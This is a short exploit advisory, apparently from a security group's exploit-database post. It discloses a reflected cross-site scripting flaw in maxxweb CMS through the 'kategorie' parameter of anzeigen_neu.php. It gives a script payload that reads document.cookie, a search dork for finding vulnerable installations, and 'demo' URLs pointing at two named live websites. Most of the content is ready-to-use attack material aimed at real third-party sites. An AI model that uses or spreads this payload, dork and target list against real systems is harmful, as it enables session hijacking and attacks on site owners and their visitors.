########################################################################################
#                                                                                      #
# Exploit Title : maxxweb Cms Cross Site Scripting Vulnerability                       #
#                                                                                      #
# Author        : Secure-Land Security Team                                            #
#                                                                                      #
# Discovered By : farbodmahini                                                         #
#                                                                                      #
# Home          : Secure-Land.net                                                      #
#                                                                                      #
# Vendor        : http://maxxweb.de                                                    #
#                                                                                      #
# Contact       : farbodmahini@yahoo.fr , farbodmahini@gmail.com                       #
#                                                                                      #
# Security Risk : Low                                                                  #
#                                                                                      #
#  DorK         : "maxxweb.de Internet-Dienstleistungen"                               #
#                                                                                      #
#                                                                                      #
########################################################################################
#                                                                                      #
#  [XSS]:                                                                              #
#                                                                                      #
#  http://[TarGeT]/anzeigen_neu.php?bereich=b&kat_id=1&kategorie=[XSS]                 #
#                                                                                      #
#  ~xss :                                                                              #
#                                                                                      #
#  “><script >alert(document.cookie)</script>                                          #
#                                                                                      #
#  Demo :                                                                              #
#                                                                                      #
#  http://www.camping-channel.info/anzeigen_neu.php?bereich=b&kat_id=4&kategorie=[XSS] #
#  http://www.cacha.de/anzeigen_neu.php?bereich=b&kat_id=4&kategorie=[XSS]             #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Special Thanks : 2MzRp-Mikili-M.Prince-0x0ptim0us                                  #
#                                                                                      #
########################################################################################
#                                                                                      #
#   Greetz : All Secure-Land Members - Packetstorm - 1337day - exploit-id              #
#                                                                                      #
########################################################################################